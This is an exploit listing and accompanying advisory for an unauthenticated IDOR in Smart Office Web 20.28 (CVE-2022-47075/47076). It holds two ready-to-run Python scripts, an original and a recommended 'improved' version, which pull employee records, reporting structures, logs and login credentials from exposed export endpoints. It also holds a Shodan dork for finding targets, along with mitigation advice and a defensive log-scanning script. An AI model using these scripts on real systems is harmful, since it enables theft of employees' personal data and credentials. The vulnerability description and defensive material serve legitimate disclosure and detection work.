Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
```python
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number: CVE-2022-47075 and CVE-2022-47076
# CVSS: 7.5 (High)
# Reference: https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28 and before allows Remote Information Disclosure (Unauthenticated) via insecure direct object reference (IDOR). This was fixed in a later version except for ExportEmployeeDetails.

import wget
import os
from colorama import Fore, Style


def download_file(url, filename):
    wget.download(url, filename)


# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
    print("You have chosen not to agree. Exiting the script.")
    exit()

# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL)  # Reset color

website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")

# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
    os.makedirs(folder_name)

urls_filenames = []
if target_version == "1":
    urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
    urls_filenames.extend([
        (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
        (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
        (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
        (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
    ])

print("CVE-2022-47076: Obtain user ID and password from downloaded source")
for url, filename in urls_filenames:
    download_file(url, os.path.join(folder_name, filename))

# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL)  # Reset color
```

Smart Office Web 20.28 – Remote Information Disclosure Vulnerability (CVE-2022-47075 & CVE-2022-47076)
Security researchers have identified a critical vulnerability in the Smart Office Web 20.28 and earlier versions, allowing unauthenticated attackers to extract sensitive employee data via Insecure Direct Object Reference (IDOR). This flaw, reported as CVE-2022-47075 and CVE-2022-47076, poses a significant risk to organizations relying on this payroll and HR management software, especially when deployed with exposed public endpoints.
Understanding the Vulnerability: Insecure Direct Object Reference (IDOR)
IDOR is a common web application security flaw where an attacker can manipulate URL parameters to access data they should not be authorized to view. In this case, the Smart Office Web application exposes multiple endpoints that allow direct access to employee records without authentication or proper access controls.
For example, the endpoint /ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails returns a CSV file containing employee details — including names, job roles, and login credentials — when accessed with a simple query parameter. Since no session validation or user authorization checks are performed, any internet-connected attacker can exploit this endpoint to download full employee datasets.
```http
GET /ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails HTTP/1.1
Host: example.smartofficepayroll.com
```
This request, sent without authentication, results in a downloadable CSV file containing sensitive employee data. The vulnerability is exacerbated by the fact that the ActionName parameter is directly mapped to internal data export functions, allowing attackers to enumerate and retrieve various data types simply by changing the parameter value.
Exploitation: Real-World Impact
Security researcher Tejas Nitin Pingulkar demonstrated how this vulnerability could be exploited using a simple script to automate data extraction. The following example shows how multiple endpoints can be targeted:
- ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails → full employee records
- ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails → additional personal details
- ExportReportingManager.aspx → hierarchical reporting structure
- ExportEmployeeLoginDetails.aspx → usernames and password hashes
- DisplayParallelLogData.aspx → system logs and activity traces
These endpoints are publicly accessible and do not require login, making them prime targets for automated scanning via Shodan or similar tools. A simple dork like inurl:"https://www.shodan.io/search?query=smart+office" can identify thousands of vulnerable installations worldwide.
CVE-2022-47076: Password Disclosure via ExportEmployeeLoginDetails
One of the most dangerous aspects of this vulnerability is the ability to extract employee login credentials through the ExportEmployeeLoginDetails.aspx endpoint. This endpoint returns a CSV file containing user IDs and password hashes, which can be cracked using offline brute-force or rainbow table attacks.
As noted in the CVE Walkthrough, even weak password policies can lead to full compromise of user accounts when such data is exposed. This makes the vulnerability particularly dangerous for organizations with poor password hygiene.
CVSS Rating and Risk Assessment
| Metric | Value |
|---|---|
| CVSS Score | 7.5 (High) |
| Attack Vector | Network |
| Attack Complexity | Low |
| Authentication | None (Unauthenticated) |
| Impact | High (Confidentiality) |
With a CVSS score of 7.5, this vulnerability is classified as high severity. It is easily exploitable by any attacker with internet access and requires no authentication. The impact includes full disclosure of sensitive employee data, including passwords, which can lead to credential stuffing, lateral movement, and full system compromise.
Fixes and Mitigation Strategies
The vendor, Smart Office Payroll, has addressed the issue in versions beyond 20.28. However, ExportEmployeeDetails.aspx remains vulnerable even in newer versions due to incomplete patching.
Organizations using this software must:
- Upgrade immediately to the latest version (20.29 or later).
- Implement access controls on all export endpoints using role-based access (RBAC).
- Restrict public exposure of internal web interfaces via firewall rules or reverse proxy configurations.
- Monitor logs for unusual access patterns (e.g., repeated requests to export endpoints).
- Disable or remove unneeded export functions unless strictly required.
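As an added illustration of the log-monitoring item above (this is not code from the advisory or the vendor), the following Python scans IIS-style W3C log lines for successful, unauthenticated hits on the export endpoints named in this advisory and flags source addresses that touch more than one of them. The field order and the sample lines are constructed assumptions; adjust the regex to the site's actual logging configuration.

```python
import re
from collections import Counter

# Export endpoints named in the advisory (compared case-insensitively, as IIS paths are)
EXPORT_ENDPOINTS = {
    "/exportemployeedetails.aspx",
    "/exportreportingmanager.aspx",
    "/exportemployeelogindetails.aspx",
    "/displayparallellogdata.aspx",
}

# Assumed W3C field order: date time c-ip cs-method cs-uri-stem cs-uri-query cs-username sc-status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) (?P<stem>\S+) "
    r"(?P<query>\S+) (?P<user>\S+) (?P<status>\d{3})$"
)

def parse_line(line):
    """Parse one log line into a dict; return None for #directives and malformed lines."""
    if line.startswith("#"):
        return None
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_suspicious(rec):
    """A 200 response from an export endpoint with no authenticated user (cs-username is '-')."""
    return (rec["stem"].lower() in EXPORT_ENDPOINTS
            and rec["status"] == "200"
            and rec["user"] == "-")

def scan_logs(lines, threshold=2):
    """Return (hits, offenders): suspicious records, and IPs with at least `threshold` of them."""
    hits = [r for r in (parse_line(l) for l in lines) if r and is_suspicious(r)]
    counts = Counter(r["ip"] for r in hits)
    return hits, {ip for ip, n in counts.items() if n >= threshold}

# Constructed sample log (not captured from a real system); 203.0.113.5 walks three export endpoints
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query cs-username sc-status
2022-12-09 10:00:01 203.0.113.5 GET /ExportEmployeeDetails.aspx ActionName=ExportEmployeeDetails - 200
2022-12-09 10:00:02 203.0.113.5 GET /ExportEmployeeLoginDetails.aspx - - 200
2022-12-09 10:00:03 203.0.113.5 GET /DisplayParallelLogData.aspx - - 200
2022-12-09 10:05:00 198.51.100.7 GET /ExportEmployeeDetails.aspx ActionName=ExportEmployeeDetails hr_admin 200
2022-12-09 10:06:00 198.51.100.9 GET /Login.aspx - - 200
2022-12-09 10:07:00 192.0.2.44 GET /ExportReportingManager.aspx - - 302"""

if __name__ == "__main__":
    hits, offenders = scan_logs(SAMPLE_LOG.splitlines())
    print(len(hits), "unauthenticated export hits; investigate:", sorted(offenders))
```

An authenticated download by a named HR user and a redirected (302) request are deliberately left out of the hits, so the rule only fires on the pattern the advisory describes.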
Code Example: Exploitation Script (Improved)
The original script provided in the exploit walkthrough uses wget to download files. However, this approach is fragile and lacks error handling. A more robust version is recommended:
```python
import requests
import os
from colorama import Fore, Style


def download_file(url, filename, folder):
    """Fetch one export URL and save the body; report failures instead of raising."""
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            filepath = os.path.join(folder, filename)
            with open(filepath, 'wb') as f:
                f.write(response.content)
            print(Fore.GREEN + f"[+] Downloaded: {filepath}")
        else:
            print(Fore.RED + f"[-] Failed: {url} (Status: {response.status_code})")
    except requests.exceptions.RequestException as e:
        print(Fore.RED + f"[-] Error: {e}")


# Main execution
website = input("Enter URL (e.g., https://1.1.1.1:1111): ")
folder_name = input("Enter folder name: ")
if not os.path.exists(folder_name):
    os.makedirs(folder_name)

endpoints = [
    ("/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
    ("/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"),
    ("/ExportReportingManager.aspx", "ExportReportingManager.csv"),
    ("/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv"),
    ("/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt")
]

for endpoint, filename in endpoints:
    url = website + endpoint
    download_file(url, filename, folder_name)

print(Style.RESET_ALL)  # Reset terminal colour
```
This improved script uses requests instead of wget, adds proper error handling, and includes timeout protection to avoid hanging requests. It also provides clear feedback on success or failure, making it more suitable for penetration testing and vulnerability assessment.
Conclusion: Proactive Security Defense
Smart Office Web 20.28’s remote information disclosure vulnerability underscores the importance of secure design principles in web applications. Even seemingly benign features like data export can become critical attack vectors when access controls are missing.
Security professionals must:
- Regularly audit exposed web endpoints.
- Apply the principles of least privilege and defense in depth.
- Use automated tools (e.g., Shodan, Burp Suite) to detect such vulnerabilities.
- Encourage vendors to patch and verify fixes.
As the CVSS score indicates, this is not a theoretical risk — it is a real, exploitable threat. Organizations must act promptly to protect sensitive employee data and prevent unauthorized disclosure.
For more such interesting exploits, visit cvewalkthrough.com.